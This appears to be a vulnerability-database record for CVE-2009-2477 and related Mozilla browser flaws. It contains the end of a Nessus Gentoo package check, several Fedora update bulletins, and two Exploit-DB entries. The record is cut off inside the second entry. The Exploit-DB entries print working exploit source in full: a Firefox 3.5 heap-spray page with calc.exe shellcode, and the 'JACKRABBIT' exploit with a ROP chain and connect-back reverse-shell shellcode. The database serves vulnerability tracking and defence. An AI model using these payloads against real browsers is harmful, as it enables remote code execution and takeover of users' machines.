Firefox,\n Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to view a specially crafted web\n page or email, possibly resulting in execution of arbitrary code or a\n Denial of Service condition. Furthermore, a remote attacker may be able\n to perform Man-in-the-Middle attacks, obtain sensitive information,\n bypass restrictions and protection mechanisms, force file downloads,\n conduct XML injection attacks, conduct XSS attacks, bypass the Same\n Origin Policy, spoof URL’s for phishing attacks, trigger a vertical\n scroll, spoof the location bar, spoof an SSL indicator, modify the\n browser’s font, conduct clickjacking attacks, or have other unspecified\n impact.\n A local attacker could gain escalated privileges, obtain sensitive\n information, or replace an arbitrary downloaded file.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-certificates/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a9b416a4\"\n );\n # https://www.mozilla.org/security/announce/2011/mfsa2011-11.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-11/\"\n );\n # https://www.mozilla.org/security/announce/2011/mfsa2011-34.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-34/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201301-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Mozilla Firefox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-10.0.11'\n All users of the Mozilla Firefox binary package should upgrade to the\n latest version:\n # 
emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-10.0.11'\n All Mozilla Thunderbird users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-10.0.11'\n All users of the Mozilla Thunderbird binary package should upgrade to\n the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-10.0.11'\n All Mozilla SeaMonkey users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-2.14-r1'\n All users of the Mozilla SeaMonkey binary package should upgrade to the\n latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-bin-2.14'\n All NSS users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/nss-3.14'\n The “www-client/mozilla-firefox” package has been merged into the\n “www-client/firefox” package. To upgrade, please unmerge\n “www-client/mozilla-firefox” and then emerge the latest\n “www-client/firefox” package:\n # emerge --sync\n # emerge --unmerge 'www-client/mozilla-firefox'\n # emerge --ask --oneshot --verbose '>=www-client/firefox-10.0.11'\n The “www-client/mozilla-firefox-bin” package has been merged into\n the “www-client/firefox-bin” package. To upgrade, please unmerge\n “www-client/mozilla-firefox-bin” and then emerge the latest\n “www-client/firefox-bin” package:\n # emerge --sync\n # emerge --unmerge 'www-client/mozilla-firefox-bin'\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-10.0.11'\n The “mail-client/mozilla-thunderbird” package has been merged into\n the “mail-client/thunderbird” package. 
To upgrade, please unmerge\n “mail-client/mozilla-thunderbird” and then emerge the latest\n “mail-client/thunderbird” package:\n # emerge --sync\n # emerge --unmerge 'mail-client/mozilla-thunderbird'\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-10.0.11'\n The “mail-client/mozilla-thunderbird-bin” package has been merged\n into the “mail-client/thunderbird-bin” package. To upgrade, please\n unmerge “mail-client/mozilla-thunderbird-bin” and then emerge the\n latest “mail-client/thunderbird-bin” package:\n # emerge --sync\n # emerge --unmerge 'mail-client/mozilla-thunderbird-bin'\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-10.0.11'\n Gentoo discontinued support for GNU IceCat. We recommend that users\n unmerge GNU IceCat:\n # emerge --unmerge 'www-client/icecat'\n Gentoo discontinued support for XULRunner. We recommend that users\n unmerge XULRunner:\n # emerge --unmerge 'net-libs/xulrunner'\n Gentoo discontinued support for the XULRunner binary package. 
We\n recommend that users unmerge XULRunner:\n # emerge --unmerge 'net-libs/xulrunner-bin'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-772\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(16, 20, 22, 59, 79, 94, 119, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:icecat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:gentoo:linux:mozilla-thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xulrunner-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/xulrunner-bin\", unaffected:make_list(), vulnerable:make_list(\"le 1.8.1.19\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird-bin\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"mail-client/mozilla-thunderbird-bin\", unaffected:make_list(), vulnerable:make_list(\"le 3.0\"))) flag++;\nif (qpkg_check(package:\"mail-client/mozilla-thunderbird\", unaffected:make_list(), vulnerable:make_list(\"le 3.0.4-r1\"))) flag++;\nif (qpkg_check(package:\"dev-libs/nss\", unaffected:make_list(\"ge 3.14\"), vulnerable:make_list(\"lt 3.14\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox-bin\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"net-libs/xulrunner\", unaffected:make_list(), vulnerable:make_list(\"le 2.0-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/mozilla-firefox-bin\", unaffected:make_list(), vulnerable:make_list(\"le 3.5.6\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey\", unaffected:make_list(\"ge 
2.14-r1\"), vulnerable:make_list(\"lt 2.14-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/icecat\", unaffected:make_list(), vulnerable:make_list(\"le 10.0-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey-bin\", unaffected:make_list(\"ge 2.14\"), vulnerable:make_list(\"lt 2.14\"))) flag++;\nif (qpkg_check(package:\"www-client/mozilla-firefox\", unaffected:make_list(), vulnerable:make_list(\"le 3.6.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Products\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "gnome-web-photo contains a thumbnailer that will be used by GNOME applications, including the file manager, to generate screenshots of web pages. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:9228A10F91B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: gnome-web-photo-0.7-4.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The Eclipse platform is designed for building integrated development environments (IDEs), server-side applications, desktop applications, and everything in between. 
", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:81F3A10F905", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: eclipse-3.4.2-13.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "XULRunner provides the XUL Runtime environment for Gecko applications. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:7315B10F8A9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: xulrunner-1.9.1.1-1.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Galeon is a web browser built around Gecko (Mozilla's rendering engine) and Necko (Mozilla's networking engine). It's a GNOME web browser, designed to take advantage of as many GNOME technologies as makes sense. Galeon was written to do just one thing - browse the web. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:8FA1D10F91A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: galeon-2.0.7-12.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The gnome-python-extra package contains the source packages for additional Python bindings for GNOME. It should be used together with gnome-python. 
", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:8F7D810F919", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: gnome-python2-extras-2.25.3-5.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Epiphany Extensions is a collection of extensions for Epiphany, the GNOME web browser. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:8C68810F918", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: epiphany-extensions-2.26.1-4.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Epiphany is the web browser for the GNOME desktop. Its goal is to be simple and easy to use. Epiphany ties together many GNOME components in order to let you focus on the Web content, instead of the browser application. Epiphany is extensible through a plugin system. Existing plugins can be found in the epiphany-extensions package. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:85DFA10F908", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: epiphany-2.26.3-2.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The OpenJDK runtime environment. 
", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:9E30310F91E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-25.b16.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Yelp is the help browser for the GNOME desktop. It is designed to help you browse all the documentation on your system in one central tool, including traditional man pages, info pages and documentation written in DocBook. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:B841210F943", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: yelp-2.26.0-5.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "This module allows you to use the Mozilla embedding widget from Perl. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:ADBF510F922", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: perl-Gtk2-MozEmbed-0.08-6.fc11.3", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T09:57:09", "description": "Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit. CVE-2009-2477,CVE-2009-2478. 
Remote exploit for windows platform", "published": "2009-07-13T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 Font tags Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477", "CVE-2009-2478"], "modified": "2009-07-13T00:00:00", "id": "EDB-ID:9137", "href": "https://www.exploit-db.com/exploits/9137/", "sourceData": "<html>\r\n<head>\r\n<title>Firefox 3.5 Vulnerability</title>\r\nFirefox 3.5 Heap Spray Vulnerabilty\r\n</br>\r\nAuthor: SBerry aka Simon Berry-Byrne\r\n</br>\r\nThanks to HD Moore for the insight and Metasploit for the payload\r\n<div id=\"content\">\r\n<p>\r\n<FONT> \r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>Loremipsumdoloregkuw</FONT></p>\r\n<p>\r\n<FONT>Loremipsumdoloregkuwiert</FONT>\r\n</p>\r\n<p>\r\n<FONT>Loremikdkw </FONT>\r\n</p>\r\n</div>\r\n<script language=JavaScript>\r\n \r\n/* Calc.exe */\r\nvar shellcode = unescape(\"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800\" + \r\n \"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A\" + \r\n \"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350\" + \r\n \"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40\" + \r\n \"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000\" + \r\n \"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040\" + \r\n \"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD\" + \r\n \"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40\" + \r\n \"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18\" + \r\n \"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0\" + \r\n \"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B\" + \r\n \"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24\" + \r\n \"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9\" + \r\n \"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C\" + \r\n \"%u652E%u6578%u9000\");\r\n/* Heap Spray Code */ \r\noneblock = 
unescape(\"%u0c0c%u0c0c\");\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length<0x60000) \r\n{\r\n fullblock += fullblock;\r\n}\r\nsprayContainer = new Array();\r\nfor (i=0; i<600; i++) \r\n{\r\n sprayContainer[i] = fullblock + shellcode;\r\n}\r\nvar searchArray = new Array()\r\n \r\nfunction escapeData(data)\r\n{\r\n var i;\r\n var c;\r\n var escData='';\r\n for(i=0;i<data.length;i++)\r\n {\r\n c=data.charAt(i);\r\n if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);\r\n escData+=c;\r\n }\r\n return escData;\r\n}\r\n \r\nfunction DataTranslator(){\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"str\"] = \"blah\";\r\n var newElement = document.getElementById(\"content\")\r\n if (document.getElementsByTagName) {\r\n var i=0;\r\n pTags = newElement.getElementsByTagName(\"p\")\r\n if (pTags.length > 0) \r\n while (i<pTags.length)\r\n {\r\n oTags = pTags[i].getElementsByTagName(\"font\")\r\n searchArray[i+1] = new Array()\r\n if (oTags[0]) \r\n {\r\n searchArray[i+1][\"str\"] = oTags[0].innerHTML;\r\n }\r\n i++\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var html = \"\";\r\n for (i=1;i<searchArray.length;i++)\r\n {\r\n html += escapeData(searchArray[i][\"str\"])\r\n } \r\n}\r\nDataTranslator();\r\nGenerateHTML()\r\n</script>\r\n</body>\r\n</html>\r\n<html><body></body></html>\r\n\r\n# milw0rm.com [2009-07-13]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9137/"}, {"lastseen": "2016-12-19T09:58:38", "description": "Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution. CVE-2009-2477. Local exploit for Linux platform. 
Tags: Client Side", "published": "2016-12-18T00:00:00", "type": "exploitdb", "title": "Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2016-12-18T00:00:00", "id": "EDB-ID:40936", "href": "https://www.exploit-db.com/exploits/40936/", "sourceData": "<!-- \r\nDownload: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz\r\nMirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40936.tgz\r\n-->\r\n\r\n<html>\r\n<head>\r\n<div id=\"content\">\r\n<p>\r\n<FONT>\r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p>\r\n<p>\r\n<FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0MERCypDK </FONT>\r\n</p>\r\n</div>\r\n<script language=\"JavaScript\">\r\nvar xunescape = unescape;\r\noneblock = xunescape(\"%u0040%u1000\");\r\nstackpivot = xunescape(\"%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141\");\r\nnopsled = 
xunescape(\"%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u
0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568\"); \r\n\r\nropgadget = xunescape(\"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000\")\r\n\r\n<!-- connect back (\"192.168.0.10,80\") ffff = port, 01020304 = ipaddr 
\"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%u0168%u0302%u6604%uff68%u43ff%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\" -->\r\n\r\nshellcode = xunescape(\"%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\");\r\n\r\n\r\nvar fullblock = oneblock; \r\nwhile (fullblock.length < 393216)\r\n{\r\n fullblock += fullblock;\r\n}\r\n\r\nvar sprayContainer = new Array();\r\nvar sprayready = false;\r\nvar sprayContainerIndex = 0;\r\n\r\nfunction fill_function()\r\n{\r\n if(! 
